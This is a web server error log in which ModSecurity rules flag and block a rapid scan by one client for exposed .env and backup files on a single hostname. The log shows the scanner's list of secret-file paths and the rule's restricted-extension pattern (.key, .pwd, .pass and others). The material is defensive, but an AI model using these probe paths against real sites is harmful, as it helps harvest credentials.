[Mon Nov 24 09:48:41.559689 2025] [:error] [pid 289423] [client 45.148.10.174:56100] [client 45.148.10.174] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aSQb6WQD9_sbehPhIhHhZgAAAAQ"]
[Mon Nov 24 09:48:41.559809 2025] [:error] [pid 289423] [client 45.148.10.174:56100] [client 45.148.10.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aSQb6WQD9_sbehPhIhHhZgAAAAQ"]
[Mon Nov 24 09:48:41.560015 2025] [:error] [pid 289423] [client 45.148.10.174:56100] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aSQb6WQD9_sbehPhIhHhZgAAAAQ"]
[Mon Nov 24 09:48:41.560205 2025] [:error] [pid 289423] [client 45.148.10.174:56100] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aSQb6WQD9_sbehPhIhHhZgAAAAQ"]
[Mon Nov 24 09:48:41.650890 2025] [:error] [pid 289423] [client 45.148.10.174:56100] [client 45.148.10.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /website/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/website/.env"] [unique_id "aSQb6WQD9_sbehPhIhHhagAAAAQ"]
[Mon Nov 24 09:48:41.651119 2025] [:error] [pid 289423] [client 45.148.10.174:56100] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/website/.env"] [unique_id "aSQb6WQD9_sbehPhIhHhagAAAAQ"]
[Mon Nov 24 09:48:41.651302 2025] [:error] [pid 289423] [client 45.148.10.174:56100] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/website/.env"] [unique_id "aSQb6WQD9_sbehPhIhHhagAAAAQ"]
[Mon Nov 24 09:48:41.673702 2025] [:error] [pid 289423] [client 45.148.10.174:56100] [client 45.148.10.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/development/.env"] [unique_id "aSQb6WQD9_sbehPhIhHhawAAAAQ"]
[Mon Nov 24 09:48:41.673925 2025] [:error] [pid 289423] [client 45.148.10.174:56100] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/development/.env"] [unique_id "aSQb6WQD9_sbehPhIhHhawAAAAQ"]
[Mon Nov 24 09:48:41.674129 2025] [:error] [pid 289423] [client 45.148.10.174:56100] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/development/.env"] [unique_id "aSQb6WQD9_sbehPhIhHhawAAAAQ"]
[Mon Nov 24 09:48:41.695549 2025] [:error] [pid 289423] [client 45.148.10.174:56100] [client 45.148.10.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aSQb6WQD9_sbehPhIhHhbAAAAAQ"]
[Mon Nov 24 09:48:41.695777 2025] [:error] [pid 289423] [client 45.148.10.174:56100] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aSQb6WQD9_sbehPhIhHhbAAAAAQ"]
[Mon Nov 24 09:48:41.695972 2025] [:error] [pid 289423] [client 45.148.10.174:56100] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aSQb6WQD9_sbehPhIhHhbAAAAAQ"]
[Mon Nov 24 09:48:41.727552 2025] [:error] [pid 289423] [client 45.148.10.174:56100] [client 45.148.10.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/shared/config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/shared/config/.env"] [unique_id "aSQb6WQD9_sbehPhIhHhbQAAAAQ"]
[Mon Nov 24 09:48:41.727796 2025] [:error] [pid 289423] [client 45.148.10.174:56100] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/shared/config/.env"] [unique_id "aSQb6WQD9_sbehPhIhHhbQAAAAQ"]
[Mon Nov 24 09:48:41.727979 2025] [:error] [pid 289423] [client 45.148.10.174:56100] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/shared/config/.env"] [unique_id "aSQb6WQD9_sbehPhIhHhbQAAAAQ"]
[Mon Nov 24 09:48:41.756843 2025] [:error] [pid 289423] [client 45.148.10.174:56100] [client 45.148.10.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/shared/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/shared/.env"] [unique_id "aSQb6WQD9_sbehPhIhHhbgAAAAQ"]
[Mon Nov 24 09:48:41.757151 2025] [:error] [pid 289423] [client 45.148.10.174:56100] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/shared/.env"] [unique_id "aSQb6WQD9_sbehPhIhHhbgAAAAQ"]
[Mon Nov 24 09:48:41.757345 2025] [:error] [pid 289423] [client 45.148.10.174:56100] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/shared/.env"] [unique_id "aSQb6WQD9_sbehPhIhHhbgAAAAQ"]
[Mon Nov 24 09:48:42.465165 2025] [:error] [pid 289423] [client 45.148.10.174:56100] [client 45.148.10.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node/.env_example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/node/.env_example"] [unique_id "aSQb6mQD9_sbehPhIhHhcQAAAAQ"]
[Mon Nov 24 09:48:42.465409 2025] [:error] [pid 289423] [client 45.148.10.174:56100] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/node/.env_example"] [unique_id "aSQb6mQD9_sbehPhIhHhcQAAAAQ"]
[Mon Nov 24 09:48:42.465599 2025] [:error] [pid 289423] [client 45.148.10.174:56100] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/node/.env_example"] [unique_id "aSQb6mQD9_sbehPhIhHhcQAAAAQ"]
[Mon Nov 24 09:48:42.491737 2025] [:error] [pid 289423] [client 45.148.10.174:56100] [client 45.148.10.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.production.local"] [unique_id "aSQb6mQD9_sbehPhIhHhcgAAAAQ"]
[Mon Nov 24 09:48:42.491970 2025] [:error] [pid 289423] [client 45.148.10.174:56100] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.production.local"] [unique_id "aSQb6mQD9_sbehPhIhHhcgAAAAQ"]
[Mon Nov 24 09:48:42.492149 2025] [:error] [pid 289423] [client 45.148.10.174:56100] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.production.local"] [unique_id "aSQb6mQD9_sbehPhIhHhcgAAAAQ"]
[Mon Nov 24 09:48:42.514077 2025] [:error] [pid 289423] [client 45.148.10.174:56100] [client 45.148.10.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aSQb6mQD9_sbehPhIhHhcwAAAAQ"]
[Mon Nov 24 09:48:42.514314 2025] [:error] [pid 289423] [client 45.148.10.174:56100] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aSQb6mQD9_sbehPhIhHhcwAAAAQ"]
[Mon Nov 24 09:48:42.514521 2025] [:error] [pid 289423] [client 45.148.10.174:56100] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aSQb6mQD9_sbehPhIhHhcwAAAAQ"]
[Mon Nov 24 09:48:42.543612 2025] [:error] [pid 289423] [client 45.148.10.174:56100] [client 45.148.10.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.example"] [unique_id "aSQb6mQD9_sbehPhIhHhdAAAAAQ"]
[Mon Nov 24 09:48:42.543852 2025] [:error] [pid 289423] [client 45.148.10.174:56100] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.example"] [unique_id "aSQb6mQD9_sbehPhIhHhdAAAAAQ"]
[Mon Nov 24 09:48:42.544033 2025] [:error] [pid 289423] [client 45.148.10.174:56100] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.example"] [unique_id "aSQb6mQD9_sbehPhIhHhdAAAAAQ"]
[Mon Nov 24 09:48:42.649465 2025] [:error] [pid 289423] [client 45.148.10.174:56100] [client 45.148.10.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.stage"] [unique_id "aSQb6mQD9_sbehPhIhHhdQAAAAQ"]
[Mon Nov 24 09:48:42.649694 2025] [:error] [pid 289423] [client 45.148.10.174:56100] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.stage"] [unique_id "aSQb6mQD9_sbehPhIhHhdQAAAAQ"]
[Mon Nov 24 09:48:42.649897 2025] [:error] [pid 289423] [client 45.148.10.174:56100] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.stage"] [unique_id "aSQb6mQD9_sbehPhIhHhdQAAAAQ"]
[Mon Nov 24 09:48:42.763175 2025] [:error] [pid 289423] [client 45.148.10.174:56100] [client 45.148.10.174] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.env.old"] [unique_id "aSQb6mQD9_sbehPhIhHhdwAAAAQ"]
[Mon Nov 24 09:48:42.763320 2025] [:error] [pid 289423] [client 45.148.10.174:56100] [client 45.148.10.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.old"] [unique_id "aSQb6mQD9_sbehPhIhHhdwAAAAQ"]
[Mon Nov 24 09:48:42.763558 2025] [:error] [pid 289423] [client 45.148.10.174:56100] [client 45.148.10.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.old"] [unique_id "aSQb6mQD9_sbehPhIhHhdwAAAAQ"]
[Mon Nov 24 09:48:42.763769 2025] [:error] [pid 289423] [client 45.148.10.174:56100] [client 45.148.10.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.old"] [unique_id "aSQb6mQD9_sbehPhIhHhdwAAAAQ"]
[Mon Nov 24 09:48:42.801957 2025] [:error] [pid 289423] [client 45.148.10.174:56100] [client 45.148.10.174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env_sample"] [unique_id "aSQb6mQD9_sbehPhIhHheAAAAAQ"]
